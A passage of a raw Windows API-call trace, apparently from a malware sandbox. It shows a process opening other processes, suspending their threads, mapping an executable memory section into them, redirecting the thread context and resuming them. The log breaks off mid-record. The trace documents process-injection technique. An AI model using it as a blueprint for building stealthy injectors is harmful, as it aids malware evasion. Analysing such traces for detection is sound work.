0x0 [0168.139] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x89c, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x138) returned 0x0 [0168.139] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0168.139] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0168.139] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x37a000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0168.140] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0168.149] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0xb94) | out: ThreadHandle=0xdea64*=0xb4) returned 0x0 [0168.150] NtSuspendThread (in: ThreadHandle=0xb4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0168.150] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0x138, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x20d0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0168.162] NtGetContextThread (in: ThreadHandle=0xb4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x37a000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0168.166] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0168.166] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x161200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0x162000) returned 0x0 [0168.182] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0x138, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x161200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x510000, SectionOffset=0x0, ViewSize=0xde6e8*=0x162000) returned 0x0 [0168.234] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0168.258] NtClose (Handle=0x140) returned 0x0 [0168.258] NtSetContextThread (ThreadHandle=0xb4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x37a000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x5de707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0168.262] NtResumeThread (in: ThreadHandle=0xb4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0168.262] NtClose (Handle=0x138) returned 0x0 [0168.262] NtClose (Handle=0xb4) returned 0x0 [0168.266] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0xbbc, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0xb4) returned 0x0 [0168.266] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0168.266] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0168.267] NtReadVirtualMemory (in: ProcessHandle=0xb4, BaseAddress=0x27f000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0168.267] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0168.274] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x424) | out: ThreadHandle=0xdea64*=0x138) returned 0x0 [0168.274] NtSuspendThread (in: ThreadHandle=0x138, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0168.274] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0xb4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2220000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0168.289] NtGetContextThread (in: ThreadHandle=0x138, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x27f000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, 